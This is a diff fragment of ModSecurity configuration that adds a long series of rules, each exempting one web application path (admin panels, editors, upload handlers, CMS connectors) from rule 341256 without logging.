+SecRule REQUEST_FILENAME "/fdlhq/admin/config\.php" "phase:2,id:93628,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-osb\.php" "phase:2,id:93629,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sysext/tstemplate/" "phase:2,id:93630,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dbadmin/" "phase:2,id:93631,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_structure\.php" "phase:2,id:93632,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagens\.php" "phase:2,id:93633,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/app_dev\.php" "phase:2,id:93634,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/generator/index\.php" "phase:2,id:93635,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/item_processor\.php" "phase:2,id:93636,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editcode/" "phase:2,id:93637,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/thememail\.php" "phase:2,id:93638,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/themechooser\.php" "phase:2,id:93639,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thumbopen\.php" "phase:2,id:93640,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sendmessage\.php" "phase:2,id:93641,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-themes-editor\.php" "phase:2,id:93642,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/kangooadmin/index\.php" "phase:2,id:93643,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:93644,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/backmin/index\.php" "phase:2,id:93645,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livechat/ajax/footprints\.php" "phase:2,id:93646,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3conf/" "phase:2,id:93647,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ntunnel_mysql\.php" "phase:2,id:93648,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/magmi_saveprofile\.php" "phase:2,id:93649,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/magmi_saveconfig\.php" "phase:2,id:93650,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/details\.php" "phase:2,id:93651,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/detail_ispravak\.php" "phase:2,id:93652,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/page/addedit\.php" "phase:2,id:93653,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/booking_apartman_podaci\.php" "phase:2,id:93654,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sfpadmin\.php" "phase:2,id:93655,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/iwp/ajax\.php" "phase:2,id:93656,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/setup/config\.php" "phase:2,id:93657,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ziegenproblem\.php" "phase:2,id:93658,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/image\.php" "phase:2,id:93659,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/unesi\.komentar\.inc\.php" "phase:2,id:93660,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiki-auto_save\.php" "phase:2,id:93661,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/querywindow\.php" "phase:2,id:93662,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/static_content_editresult_mobile\.php" "phase:2,id:93663,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/form/configuration\.php" "phase:2,id:93664,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/site_checker\.php" "phase:2,id:93665,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ins_upd_data\.php" "phase:2,id:93666,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajaxfilemanager\.php" "phase:2,id:93667,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_get_file_listing\.php" "phase:2,id:93668,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/assets/inc/bin/general\.services\.php" "phase:2,id:93669,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_image_editor\.php" "phase:2,id:93670,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/beheer/toolboxx\.php" "phase:2,id:93671,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/aktualnolight_elementi\.php" "phase:2,id:93672,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/counterize/counterize\.php" "phase:2,id:93673,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/v6_pages_engine\.php" "phase:2,id:93674,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/v7_pages_engine\.php" "phase:2,id:93675,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wwwsqldesigner/" "phase:2,id:93676,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bottom\.php" "phase:2,id:93677,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/clients/admin/addonmodules\.php" "phase:2,id:93678,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/graps-cms\.php" "phase:2,id:93679,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sadrzajdrag_elementi\.php" "phase:2,id:93680,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/listaproperty\.php" "phase:2,id:93681,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plazadmin\.php" "phase:2,id:93682,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/filtteri" "phase:2,id:93683,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/jrscgi/update\.cgi" "phase:2,id:93684,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:93685,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/user-edit\.php" "phase:2,id:93686,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/options-website\.php" "phase:2,id:93687,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/savefile\.html" "phase:2,id:93688,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/database/cashtrack\.php" "phase:2,id:93689,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/winkelmodule/naardab\.php" "phase:2,id:93690,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/write-post\.php" "phase:2,id:93691,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/website/beheer/edit\.php" "phase:2,id:93692,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/potenzen_1_formmailer\.php" "phase:2,id:93693,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/catalogusbijwerken\.php" "phase:2,id:93694,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livechat/server\.php" "phase:2,id:93695,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_updatemedia\.php" "phase:2,id:93696,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/afg_img_rsz\.php" "phase:2,id:93697,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/pagina_edit\.php" "phase:2,id:93698,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/resource/index\.php" "phase:2,id:93699,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/index\.php" "phase:2,id:93700,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/getxml\.php" "phase:2,id:93701,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax-tab\.php" "phase:2,id:93702,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:93703,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livechat/mobile/chat\.php" "phase:2,id:93704,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/soap\.hsp" "phase:2,id:93705,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailman/admindb/*" "phase:2,id:93706,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/save\.php" "phase:2,id:93707,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/sort_edit\.php" "phase:2,id:93708,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/geweest\.php" "phase:2,id:93709,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/project/project_item\.php" "phase:2,id:93710,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/pdfjs-viewer-shortcode/web/viewer\.php" "phase:2,id:93711,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/process_submission\.php" "phase:2,id:93712,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax-upgradetab\.php" "phase:2,id:93713,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/updatemail\.php" "phase:2,id:93714,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/toevoegen_gemee\.php" "phase:2,id:93715,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms_gemeentetiel/" "phase:2,id:93716,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/deleteblogui\.php" "phase:2,id:93717,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/check_mandatory_fields\.php" "phase:2,id:93718,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/assets/components/migx/connector\.php" "phase:2,id:93719,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administration/modifier/formulaire\.php" "phase:2,id:93720,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:93721,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit_config\.php" "phase:2,id:93722,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admineditevent\.php" "phase:2,id:93723,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/article_edit\.php" "phase:2,id:93724,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/serendipity_admin\.php" "phase:2,id:93725,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upload_resize\.php" "phase:2,id:93726,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/main/php/editor\.php" "phase:2,id:93727,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/scp/canned\.php" "phase:2,id:93728,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/scp/tickets\.php" "phase:2,id:93729,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/scp/settings\.php" "phase:2,id:93730,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/didwegetthiswrong\.php" "phase:2,id:93731,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/config_payments_form\.php" "phase:2,id:93732,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v2/edit\.php" "phase:2,id:93733,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/b/ss/appleusstartpage/" "phase:2,id:93734,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/script-youtube-bg\.php" "phase:2,id:93735,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm_vsz/servert_up\.php" "phase:2,id:93736,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/smb/web/web-server-settings/" "phase:2,id:93737,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/smb/web/edit/" "phase:2,id:93738,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajaxupload\.php" "phase:2,id:93739,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajaxupload2\.php" "phase:2,id:93740,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/searchreplacedb2\.php" "phase:2,id:93741,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/static/ajax\.php" "phase:2,id:93742,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/js/tiny_mce/plugins/filemanager/upload\.php" "phase:2,id:93743,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tools/payment_methods\.php" "phase:2,id:93744,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sitesetup\.php" "phase:2,id:93745,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifybloguim\.php" "phase:2,id:93746,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addeditartikel\.php" "phase:2,id:93747,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/load1pdf\.php" "phase:2,id:93748,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/_cmsms/admin/moduleinterface\.php" "phase:2,id:93749,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/ci_car_f\.php" "phase:2,id:93750,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/saveedititem\.php" "phase:2,id:93751,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:93752,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livesupport/server\.php" "phase:2,id:93753,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/scripts/process_submission\.php" "phase:2,id:93754,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/package_add_result\.php" "phase:2,id:93755,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ee-admin\.php" "phase:2,id:93756,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fulladmin/configproducts\.php" "phase:2,id:93757,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/product_options\.json\.php" "phase:2,id:93758,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/supportannouncements\.php" "phase:2,id:93759,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/fixtures_update\.php" "phase:2,id:93760,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/private\.php" "phase:2,id:93761,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/vba_gallery_admin\.php" "phase:2,id:93762,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/multitv\.connector\.php" "phase:2,id:93763,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e_editwrite\.php" "phase:2,id:93764,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e_date\.php" "phase:2,id:93765,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dnsmanagement\.php" "phase:2,id:93766,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/clientarea\.php" "phase:2,id:93767,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/thumbnails\.php" "phase:2,id:93768,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/stats\.php" "phase:2,id:93769,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/agreement_edit\.php" "phase:2,id:93770,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/process/processdb\.php" "phase:2,id:93771,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mdeploy\.php" "phase:2,id:93772,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/themify/img\.php" "phase:2,id:93773,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/worldpay\.php" "phase:2,id:93774,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:93775,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_edit\.php" "phase:2,id:93776,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/content\.php" "phase:2,id:93777,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/xoops/configproducts\.php" "phase:2,id:93778,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/engine/index\.php" "phase:2,id:93779,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/derefer\.php" "phase:2,id:93780,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/change_it\.php" "phase:2,id:93781,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/secure/moveissue\.jspa" "phase:2,id:93782,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/configaddonmods\.php" "phase:2,id:93783,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit_menu\.php" "phase:2,id:93784,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/s/process\.php" "phase:2,id:93785,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/flash/gate\.php" "phase:2,id:93786,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/multimediasave\.do" "phase:2,id:93787,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/restaurant\.php" "phase:2,id:93788,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugins\.php" "phase:2,id:93789,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/item\.php" "phase:2,id:93790,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/components/com_avchat3/chat/wget\.php" "phase:2,id:93791,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/securimage_play\.swf" "phase:2,id:93792,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/frontpageupdate\.php" "phase:2,id:93793,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:93794,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/document_general\.php" "phase:2,id:93795,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lib/exe/ajax\.php" "phase:2,id:93796,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quickview\.aspx" "phase:2,id:93797,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:93798,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/updatepage\.php" "phase:2,id:93799,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/widget_engine\.php" "phase:2,id:93800,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v2_news_engine\.php" "phase:2,id:93801,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_routines\.php" "phase:2,id:93802,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cmd/pagina\.php" "phase:2,id:93803,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/advcp/" "phase:2,id:93804,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0101_change_text\.php" "phase:2,id:93805,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
